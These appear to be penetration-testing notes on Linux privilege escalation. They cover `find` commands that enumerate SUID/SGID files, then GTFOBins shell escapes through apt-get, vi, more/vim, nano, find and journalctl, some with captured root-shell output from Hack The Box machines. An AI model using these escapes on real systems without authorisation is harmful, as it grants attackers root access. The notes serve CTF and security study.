# SUID/SGID

## SUID/SGID

```
find / -perm -u=s -type f 2>/dev/null

# Find files with SUID configured
find / -perm -4000 -type f 2>/dev/null
find / -perm 4755

# Find all the SUID/SGID executables 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
```

## Enum SUID / SGID - Find

```
find /etc -perm 777
find / -user username

# Find files with SUID configured
find /usr/bin -perm 4755

# Find files with SGID configured
find /usr/bin -perm 2755

# Find files with the Sticky Bit configured
find /etc -perm /1444
```

{% embed url="<https://www.redhat.com/sysadmin/audit-permissions-find>" %}

## Setuid

The `setuid` bit appears as an `s`.

```shell-session
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
```

## Setgid

```
find / -uid 0 -perm -6000 -type f 2>/dev/null
```

```shell-session
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine
```

## GTFOBins

{% embed url="<https://gtfobins.github.io/>" %}

### apt-get

```shell-session
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

# id
uid=0(root) gid=0(root) groups=0(root)
```

### Vi

```
sudo vi
:!sh
```

### More -> Vim

Réduire la taille du terminal au maximum pour piéger More. Quand dans More appuyer sur v pour entrer dans VIM

```
Dans vim
:set shell=/bin/sh
:shell
```

{% embed url="<https://gtfobins.github.io/gtfobins/vim/>" %}

### Nano

```
./nano
^R^X
reset; sh 1>&0 2>&0
```

{% embed url="<https://gtfobins.github.io/gtfobins/nano/#file-read>" %}

{% embed url="<https://0xss0rz.github.io/2020-08-05-HTB-OpenAdmin/>" %}

### Find

```
find . -exec /bin/sh -p \; -quit`
```

{% embed url="<https://gtfobins.github.io/gtfobins/find/>" %}

### Journalctl

```
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
```

{% embed url="<https://0xss0rz.github.io/2020-08-05-HTB-Traverxec/>" %}

{% embed url="<https://gtfobins.github.io/gtfobins/journalctl/>" %}

### Systemctl

{% embed url="<https://gtfobins.github.io/gtfobins/systemctl/>" %}

## Tool

{% embed url="<https://github.com/Frissi0n/GTFONow>" %}